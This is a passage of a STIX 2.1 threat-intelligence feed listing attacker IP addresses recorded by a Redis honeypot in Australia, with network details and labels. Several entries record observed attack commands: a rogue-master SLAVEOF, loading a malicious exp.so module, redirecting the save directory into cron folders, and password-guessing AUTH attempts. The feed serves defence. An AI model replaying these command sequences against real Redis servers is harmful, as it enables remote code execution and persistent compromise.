      "modified": "2026-03-07T17:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '172.110.223.51']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T17:25:07.000Z",
      "valid_until": "2026-04-08T17:25:06.000Z"
    },
    {
      "created": "2026-03-07T18:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=21; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; cats=Generic Protocol Command Decode; redis_cmds=MODULE UNLOAD system,SLAVEOF NO ONE; redis_cmd_hits=0; cmd=\"SLAVEOF NO ONE\"",
      "id": "indicator--c18c31b9-8ba1-42f8-b76c-6b56134060f5",
      "labels": [
        "command_and_control"
      ],
      "modified": "2026-03-07T18:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '47.112.125.139']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T18:25:03.000Z",
      "valid_until": "2026-04-08T18:25:01.000Z"
    },
    {
      "created": "2026-03-07T18:25:03.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--7a146bf6-c6e9-4c0d-991a-070c1bf4edf6",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-07T18:25:03.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '66.132.153.126']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T18:25:03.000Z",
      "valid_until": "2026-04-08T18:25:01.000Z"
    },
    {
      "created": "2026-03-07T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--1e3d2809-bd88-44bd-943e-2d5b020a4868",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-07T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '159.89.226.104']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T19:25:13.000Z",
      "valid_until": "2026-04-08T19:25:12.000Z"
    },
    {
      "created": "2026-03-07T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=BR; asn=272764; asn_org=DaLink Telecom LTDA; cats=Generic Protocol Command Decode,Misc activity; redis_cmd_hits=0; cmd=\"SSH-2.0-paramiko_3.5.1  \"",
      "id": "indicator--8251aaa9-304a-4fd2-a24b-ee887cc449af",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-07T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '209.14.6.22']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T19:25:13.000Z",
      "valid_until": "2026-04-08T19:25:12.000Z"
    },
    {
      "created": "2026-03-07T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--290620fd-4dbe-47e5-8341-2682d79e58d8",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-07T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '64.227.30.79']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T19:25:13.000Z",
      "valid_until": "2026-04-08T19:25:12.000Z"
    },
    {
      "created": "2026-03-07T20:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--21e6f3cd-84af-4861-be6b-e490bd51ae2f",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-07T20:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '205.210.31.84']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T20:25:07.000Z",
      "valid_until": "2026-04-08T20:25:06.000Z"
    },
    {
      "created": "2026-03-07T21:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=58466; asn_org=CHINANET Guangdong province network; redis_cmd_hits=0",
      "id": "indicator--6357eb1f-f8f7-40ec-b2a9-c678f0745d48",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-07T21:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '14.116.219.149']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T21:25:07.000Z",
      "valid_until": "2026-04-08T21:25:05.000Z"
    },
    {
      "created": "2026-03-07T22:25:09.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=IN; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--3fe1e23e-98b5-4379-be5b-d1688d41aa86",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-07T22:25:09.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.235.199.122']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-07T22:25:09.000Z",
      "valid_until": "2026-04-08T22:25:08.000Z"
    },
    {
      "created": "2026-03-08T00:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=40; ports=6379; cc=HK; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; redis_cmds=CONFIG SET dbfilename exp.so,MODULE UNLOAD system,config set dir /var/spool/cron/,MODULE LOAD /tmp/exp.so,save; redis_cmd_hits=0; cmd=\"SLAVEOF NO ONE\"",
      "id": "indicator--816e1a3e-4401-440b-a489-d8ec983b24b1",
      "labels": [
        "command_and_control"
      ],
      "modified": "2026-03-08T00:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '47.243.177.131']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T00:25:13.000Z",
      "valid_until": "2026-04-09T00:25:12.000Z"
    },
    {
      "created": "2026-03-08T01:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=38; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; cats=Misc activity; redis_cmds=SLAVEOF 47.86.104.180 60131,CONFIG SET dbfilename exp.so,MODULE LOAD /tmp/exp.so,SLAVEOF NO ONE,config set rdbcompression no; redis_cmd_hits=0; cmd=\"SLAVEOF NO ONE\"",
      "id": "indicator--08fa34a2-f183-406c-b5c2-576706fb2be2",
      "labels": [
        "command_and_control"
      ],
      "modified": "2026-03-08T01:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '47.120.36.3']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T01:25:13.000Z",
      "valid_until": "2026-04-09T01:25:12.000Z"
    },
    {
      "created": "2026-03-08T04:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=SG; asn=141995; asn_org=Contabo Asia Private Limited; redis_cmd_hits=0",
      "id": "indicator--338dd345-45be-4bb3-a768-e56478f6de28",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-08T04:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '62.146.237.25']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T04:25:13.000Z",
      "valid_until": "2026-04-09T04:25:12.000Z"
    },
    {
      "created": "2026-03-08T06:25:09.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=59; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--f8956b90-5815-4dab-92c1-838d4ba79c00",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-08T06:25:09.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '3.151.241.153']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T06:25:09.000Z",
      "valid_until": "2026-04-09T06:25:08.000Z"
    },
    {
      "created": "2026-03-08T06:25:09.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--0d72c8c6-ef19-466d-838f-25f1397f5ef1",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-08T06:25:09.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '40.117.230.15']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T06:25:09.000Z",
      "valid_until": "2026-04-09T06:25:08.000Z"
    },
    {
      "created": "2026-03-08T09:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=PH; asn=9658; asn_org=Eastern Telecoms Phils., Inc.; redis_cmd_hits=0",
      "id": "indicator--a988514a-c4e0-46a9-a019-54119250e1df",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-08T09:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '180.232.31.146']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T09:25:13.000Z",
      "valid_until": "2026-04-09T09:25:12.000Z"
    },
    {
      "created": "2026-03-08T10:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=19; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--b8690fcd-f7c1-48c8-a266-2ea0bea70d6b",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-08T10:25:06.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '161.35.230.3']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T10:25:06.000Z",
      "valid_until": "2026-04-09T10:25:05.000Z"
    },
    {
      "created": "2026-03-08T11:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=8; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Misc activity; redis_cmd_hits=0",
      "id": "indicator--0a6c8b19-290f-47da-9760-f1552be5820b",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-08T11:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '18.220.248.172']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T11:25:13.000Z",
      "valid_until": "2026-04-09T11:25:12.000Z"
    },
    {
      "created": "2026-03-08T12:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=IN; asn=139549; asn_org=Crisp Enterprises; redis_cmd_hits=0",
      "id": "indicator--d5ce8771-117a-4e93-8181-944c5f3e0d0d",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-08T12:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '103.124.172.141']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T12:25:13.000Z",
      "valid_until": "2026-04-09T12:25:12.000Z"
    },
    {
      "created": "2026-03-08T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14956; asn_org=RouterHosting LLC; redis_cmds=CONFIG SET dir /etc/cron.d/,CONFIG SET dbfilename rsync; redis_cmd_hits=0; cmd=\"CONFIG SET dir /etc/cron.d/\"",
      "id": "indicator--8d93facd-5669-44a3-b33d-a28df3ab296e",
      "labels": [
        "malware_hosting"
      ],
      "modified": "2026-03-08T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '144.172.98.169']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T13:25:13.000Z",
      "valid_until": "2026-04-09T13:25:12.000Z"
    },
    {
      "created": "2026-03-08T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--ab54878f-4ef8-4fa2-8fdb-957b36d4cb2f",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-08T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.248.133.118']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T13:25:13.000Z",
      "valid_until": "2026-04-09T13:25:12.000Z"
    },
    {
      "created": "2026-03-08T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0",
      "id": "indicator--8e2e98c6-5888-4fc9-ae89-7cd66f868578",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-08T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '23.92.27.206']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T13:25:13.000Z",
      "valid_until": "2026-04-09T13:25:12.000Z"
    },
    {
      "created": "2026-03-08T14:25:10.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4808; asn_org=China Unicom Beijing Province Network; redis_cmd_hits=0",
      "id": "indicator--84d05e4b-fcce-4969-a37f-cd740a3c78cc",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-08T14:25:10.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '114.113.235.163']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T14:25:10.000Z",
      "valid_until": "2026-04-09T14:25:08.000Z"
    },
    {
      "created": "2026-03-08T14:25:10.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=ZA; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--ab750f58-4e81-40c3-b3dd-3e3826b7b071",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-08T14:25:10.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.87.233.62']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T14:25:10.000Z",
      "valid_until": "2026-04-09T14:25:08.000Z"
    },
    {
      "created": "2026-03-08T14:25:10.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--e5bea4fa-d8dd-4b68-a473-dceba64d0142",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-08T14:25:10.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '65.49.20.67']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T14:25:10.000Z",
      "valid_until": "2026-04-09T14:25:08.000Z"
    },
    {
      "created": "2026-03-08T14:25:10.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--1514517a-c85f-459f-a695-c1397c600b33",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-08T14:25:10.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '65.49.20.95']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T14:25:10.000Z",
      "valid_until": "2026-04-09T14:25:08.000Z"
    },
    {
      "created": "2026-03-08T14:25:10.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=FR; asn=209334; asn_org=Modat B.V.; redis_cmds='GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--9defc4ad-c2fe-4bf4-9b48-879737233edf",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-08T14:25:10.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '85.217.140.37']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T14:25:10.000Z",
      "valid_until": "2026-04-09T14:25:08.000Z"
    },
    {
      "created": "2026-03-08T15:25:10.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0",
      "id": "indicator--d3aa3816-d116-4d72-8023-c5e8484c8c8f",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-08T15:25:10.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '120.48.151.68']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T15:25:10.000Z",
      "valid_until": "2026-04-09T15:25:09.000Z"
    },
    {
      "created": "2026-03-08T17:25:10.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=66; ports=6379; cc=US; asn=14956; asn_org=RouterHosting LLC; redis_cmds=AUTH admin,CONFIG SET dir /etc/cron.d/,AUTH root,CONFIG SET dir /var/spool/cron/,AUTH password; redis_cmd_hits=0; cmd=\"AUTH root\"",
      "id": "indicator--5b0f8354-330f-4077-a2bc-10a2700d2832",
      "labels": [
        "malware_hosting"
      ],
      "modified": "2026-03-08T17:25:10.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '172.86.113.129']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T17:25:10.000Z",
      "valid_until": "2026-04-09T17:25:09.000Z"
    },
    {
      "created": "2026-03-08T18:25:02.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--b5ef6c2c-ae78-4a03-bf7e-cc38edc18989",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-08T18:25:02.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '101.201.71.213']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T18:25:02.000Z",
      "valid_until": "2026-04-09T18:25:01.000Z"
    },
    {
      "created": "2026-03-08T18:25:02.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--acf5888d-3e2b-4325-a02b-8f5787d9e3b5",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-08T18:25:02.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '40.124.116.246']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T18:25:02.000Z",
      "valid_until": "2026-04-09T18:25:01.000Z"
    },
    {
      "created": "2026-03-08T18:25:02.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--50e95393-3cb8-4395-bef7-1a6c82bdd07b",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-08T18:25:02.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '68.183.99.196']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T18:25:02.000Z",
      "valid_until": "2026-04-09T18:25:01.000Z"
    },
    {
      "created": "2026-03-08T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--4f837022-c40d-49a1-b2cb-649628bf3c0f",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-08T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.94.138.32']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T19:25:13.000Z",
      "valid_until": "2026-04-09T19:25:12.000Z"
    },
    {
      "created": "2026-03-08T22:25:10.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--c374350b-2780-4e9f-aadb-3d4434c04b44",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-08T22:25:10.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.171.32.24']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T22:25:10.000Z",
      "valid_until": "2026-04-09T22:25:05.000Z"
    },
    {
      "created": "2026-03-08T22:25:10.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--c4e1347f-fbc7-456b-ab4d-11bee6e6b5ef",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-08T22:25:10.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '8.136.108.109']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-08T22:25:10.000Z",
      "valid_until": "2026-04-09T22:25:05.000Z"
    },
    {
      "created": "2026-03-09T00:25:10.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=CA; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--76ebcfe7-314b-4700-879a-db8caf635b6a",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-09T00:25:10.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '130.107.158.17']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T00:25:10.000Z",
      "valid_until": "2026-04-10T00:25:09.000Z"
    },
    {
      "created": "2026-03-09T00:25:10.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=IN; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--dffb087c-385c-450d-8c91-fd246af58701",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-09T00:25:10.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '135.235.236.63']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T00:25:10.000Z",
      "valid_until": "2026-04-10T00:25:09.000Z"
    },
    {
      "created": "2026-03-09T00:25:10.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0",
      "id": "indicator--31723584-f829-40a9-ad57-8bde67bc63be",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-09T00:25:10.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '185.242.226.20']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T00:25:10.000Z",
      "valid_until": "2026-04-10T00:25:09.000Z"
    },
    {
      "created": "2026-03-09T01:25:11.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=134768; asn_org=CHINANET SHAANXI province Cloud Base network; redis_cmd_hits=0",
      "id": "indicator--97eee190-c81f-41f2-b9cd-6f658c6c5123",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-09T01:25:11.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '103.236.70.21']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-09T01:25:11.000Z",
      "valid_until": "2026-04-10T01:25:06.000Z"
    },
    {
      "created": "2026-03-09T04:25:06.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--dd49ac26-b46a-4f8e-89de-b6c19045e73e",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-09T04:25:06.000Z",
